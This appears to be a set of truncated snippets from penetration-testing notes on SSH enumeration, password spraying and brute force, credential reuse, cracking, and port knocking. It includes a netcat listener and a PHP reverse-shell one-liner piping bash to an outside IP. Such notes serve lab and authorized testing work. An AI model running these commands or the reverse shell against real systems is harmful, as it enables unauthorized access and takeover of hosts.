-
Notes
If the server needs old crypto, use -oKexAlgorithms=+diffie-hellman-group1-sha1
OpenSSH 7.7 allows enumerating existing users.
It could be possible on Windows 10 ssh-agent to extract the keys.
Keys
Get fingerprints: nmap -p22 --script ssh-hostkey $target
Get hostkeys: nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full $target
Extract fingerprints from an existing key file: ssh-keygen -E md5 -lf /tmp/found_key ; ssh-keygen -E sha1…
-
Enumeration
Mandatory
Try to access: ssh -v $target
Optional
Reuse existing credentials
Brute-force with existing usernames (password spraying)
Try ssh-audit $target
Try known usernames with the username as password, or with other found strings.
Privilege Escalation
Find the .ssh directory on the file system and check all files within it.
Check the sshd_config file.
Check the SSH version for exploits.
-
(!) See also Password spraying to check an obtained password against usernames.
Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly.
Wordlist optimization
If a password policy is known: Check the password policy. In Windows, type net accounts to get information about account locking, lockout thresholds etc.
Cloud-based performance cracking: See NPK
Default passwords
Hashcat Am…
-
IF THE METERPRETER SHELL GETS STUCK, TRY PRESSING ENTER MULTIPLE TIMES ON THE VICTIM.
Setting up
Listen on a system that can be reached, e.g. with nc -lnvp 9998 [l=listen, v=verbose, p=port, n=no_resolution]. Then initiate the connection from the target system. Here is an example directly in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Another example, e.g. directly in a console…
-
With knockd a server can be configured to respond only after a certain sequence of ports has been probed first. It's often used for SSH. Countermeasure: Sniff traffic, wait for a user to log in, and reconstruct the knocking pattern from the pcaps.